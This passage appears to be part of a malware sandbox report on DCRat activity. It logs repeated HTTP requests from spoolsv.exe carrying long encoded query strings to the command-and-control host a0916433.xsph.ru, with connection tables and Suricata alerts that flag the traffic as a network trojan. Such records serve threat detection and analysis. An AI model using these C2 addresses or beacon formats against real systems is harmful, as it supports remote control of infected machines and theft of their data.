BTWUxUMrdUSwBTRW9WVtNmdOVUSwlkRLNnVHRWdstWS2k0UaRnRtRlVCFTUpdXaJBXRww0ToNUS5Z1RkdnRHplQCl3Yqx2RhdnRtNGSCNVUIplRJtmSYl1a1cVWw4EbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSD50dJpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQGMxUWNjFGN1MjZ2IWNxQjZhRmMmJTNwQjY3MDNyMTMiwiI4EDZ1EWN5AzYxkjM3gjYxIWMhhTMjVWMzYTM4gTZkhTYmdTNldzNmJiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
2440 | spoolsv.exe | GET | 200 | 141.8.192.193:80 | http://a0916433.xsph.ru/167688ac.php?H1xMrvZ5TpJpyfKsNVhwLQTqmzDwx=4Tm0&xqeGU=LcEvwB9kfdYY0s0iGj1rnHPv0C&ZXBtPN8AyO50yDLRlf4wIQPj4OmKEN=4tEkNdtJL1s&3e55dca66705f5956239bd9b437ba817=QZxkTO3EmY1YWNwcDNkVzNmBzMwADOjBDM1QzNmlTY5QjN4MDN1gzYwkDOwEzN3QzNxgDOzQjM&e12a62e25d56ee324f7298b2ee53e93b=AMhVjYwgTM2Y2NhJDNxUzMjZjNwUjMiR2YyUmM2EjM0ImMmhzY0EWM&ae92ade0c9d83e6854d5730c4f752f34=d1nI0IDM3YTOllTOkdTNiZWZ4cDNyYWY4I2YyEGMiRzY5ETZxUWYmZDZ4IiOiYzN5IWNzImZkRGMhZ2YhJjNlRjZ2AzNihDOzkjYlBTOiwiI1IzMxczM0gTNyYWMwADNwgjNxEGNiJWZjNTN3cDNhVWNjZDNyMWMiJiOiUWZyUWN1AjY4ADN4ITZmJGNygjZ3ImNlZTNxADM5kTMis3W&4ece83265ab76456ee6b0b2fa2a12baf=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 | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2440 | spoolsv.exe | 141.8.192.193:80 | a0916433.xsph.ru | Sprinthost.ru LLC | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
a0916433.xsph.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |
2440 | spoolsv.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |
2440 | spoolsv.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain |